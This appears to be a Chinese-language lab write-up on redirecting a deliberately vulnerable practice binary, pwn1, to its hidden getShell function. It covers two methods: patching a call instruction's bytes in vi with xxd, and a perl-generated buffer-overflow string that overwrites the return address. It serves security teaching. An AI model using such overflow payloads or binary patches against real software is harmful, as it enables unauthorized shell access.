实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。
我们将学习两种方法:
•利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
•手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
基础知识
•objdump命令反汇编目标文件;
vi内
将显示模式切换为16进制模式
:%!xxd
查找要修改的内容
/内容
转换16进制为原格式
:%!xxd -r
存盘退出vi
:wq
实验步骤
实验1、直接修改程序机器指令,改变程序执行流程
·首先进入Vi模式,然后输入:%!xxd
,将显示模式切换为16进制模式
·查找要修改的内容/e8d7
·找到后前后的内容和反汇编的对比下,确认是地方是正确的
·修改d7为c3
·转换16进制为原格式:%!xxd -r
·存盘退出vi:wq
实验2、通过构造输入参数,造成BOF攻击,改变程序执行流
用objdump -d pwn1 | more
语句来实现反汇编,管道的作用是将前半段的输出作为后半段的输入,从而输出出来。
在输出的反汇编语句中找到getshell
函数段
•使用perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
指令将perl生成的字符串存储到文件input中。
•使用输出重定向“>”将perl生成的字符串存储到文件input中。